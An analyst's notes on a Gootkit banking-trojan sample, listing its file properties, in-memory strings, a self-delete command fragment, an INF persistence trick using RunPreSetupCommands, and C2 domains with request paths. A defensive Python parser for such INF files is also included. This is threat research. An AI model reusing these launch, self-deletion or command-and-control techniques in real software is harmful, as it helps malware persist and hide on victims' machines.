Neonprimetime

2018-04-02 My Online Security @dvk01uk #gootkit

Apr 2nd, 2018
My Online Security @dvk01uk #gootkit
https://twitter.com/dvk01uk/status/980835227554721803
https://www.hybrid-analysis.com/sample/c71b7e669e5c614551ccd7157785d3e0e0c79277c1b65a1ce90732bc8f87b430?environmentId=100

runs CPU up to a high %, uses up to 7 MB of memory, then stops

------------
random file properties
------------
OriginalFilename,Ascend.exe
LegalTrademarks,Adobe Systems Incorporated Copyright ©. 1999 - 2014
file-description,Sexting Micrn Shuttle Specularmaterial Bitlocker Irowset

------------
interesting in-memory strings
------------
0x127d1c (11): mp3 (*.mp3)
0x54fa3f0 (72): /c ping localhost -n 4 & del /F /Q "
0x54fa44c (22): & move /Y "
0x54fa464 (20): .update" "
0x54fa47c (22): " > nul & "
0x54fa50c (18): MP3 file corrupted
0x556b430 (60): \SystemRoot\system32\mstsc.exe
0x556b4c8 (312): [Version]
signature = "$CHICAGO$"
[DefaultInstall]
RunPreSetupCommands = %s:2
0x55c957f (21): 1$1+161>1E1R1\1c1i1p1
04BAFB24 0030B168 "RandomListenPortBase"
04BAFB28 04BAFD3C "6000" <-- securityintelligence.com blog says this is gootkit's default http proxy port
RunPreSetupCommands = xhkecdteryxu:2

-------------
interesting file contents [executable name].inf
-------------
[Version]
signature = "$CHICAGO$"
AdvancedINF = 2.5, "You need a new version of advpack.dll"

[DefaultInstall]
RunPreSetupCommands = xhkecdteryxu:2

[xhkecdteryxu]
C:\Users\Win732\Desktop\gootkit - Copy.exe
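
As an added example (not part of the paste or of the sample itself), a small Python parser for the INF layout above: it follows the RunPreSetupCommands reference in [DefaultInstall] to its randomly named section and returns the command lines that section holds, which is the check a defender would run over dropped .inf files. The INF embedded in it is constructed from the fields noted above.

```python
import re
from typing import Dict, List

# Constructed sample INF, laid out like the one noted above (a random
# section name that holds the path of the dropped executable).
SAMPLE_INF = """[Version]
signature = "$CHICAGO$"
AdvancedINF = 2.5, "You need a new version of advpack.dll"

[DefaultInstall]
RunPreSetupCommands = xhkecdteryxu:2

[xhkecdteryxu]
C:\\Users\\Win732\\Desktop\\gootkit - Copy.exe
"""

# [DefaultInstall] keys that make advpack.dll run the lines of a named section.
RUN_KEYS = ("runpresetupcommands", "runpostsetupcommands")


def parse_inf(text: str) -> Dict[str, List[str]]:
    """Map each section name (lower-cased) to its non-empty lines.
    Command sections hold bare lines with no '=', so configparser is avoided."""
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):   # skip blanks and comments
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def run_commands(text: str) -> List[str]:
    """Follow every Run*SetupCommands = section[:flag] reference in
    [DefaultInstall] and return the command lines those sections hold."""
    sections = parse_inf(text)
    found: List[str] = []
    for line in sections.get("defaultinstall", []):
        key, _, value = line.partition("=")
        if key.strip().lower() not in RUN_KEYS:
            continue
        for ref in value.split(","):
            name = ref.strip().split(":", 1)[0].lower()  # drop the ":2" flag
            found.extend(sections.get(name, []))
    return found
```

Running `run_commands(SAMPLE_INF)` yields the single executable path from the [xhkecdteryxu] section; on a real host the same call can be applied to any .inf found next to an unknown binary.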


-------------------------
interesting api calls
-------------------------
0A759140 | 50 | push eax | eax:"safenetssl.com"
0A759141 | FF 15 EC B2 76 0A | call dword ptr ds:[<&gethostbyname>] |

04DAF990 0030B368 L"GET"
04DAF994 0030B348 L"/rbody320"
0A759B75 | FF 15 CC B2 76 0A | call dword ptr ds:[<&WinHttpOpenRequest>] |

0A75CB43 | 52 | push edx | edx:L"https://safenetssl.com:80/"
0A75CB44 | FF 15 A8 B2 76 0A | call dword ptr ds:[<&WinHttpCrackUrl>] |

0A758754 | 8B 4D EC | mov ecx,dword ptr ss:[ebp-14] | [ebp-14]:"securesslweb.com"
0A758757 | 51 | push ecx | ecx:&"/rpersist4/%d"

0A760DB3 | 50 | push eax | eax:L"C:\\Users\\xxx\\Desktop\\[executable].exe --vwxyz"
0A760DB4 | 6A 00 | push 0 |
0A760DB6 | FF 15 0C B2 76 0A | call dword ptr ds:[<&CreateProcessW>] |

---------------
strings from ssl traffic
---------------
safenetssl.com.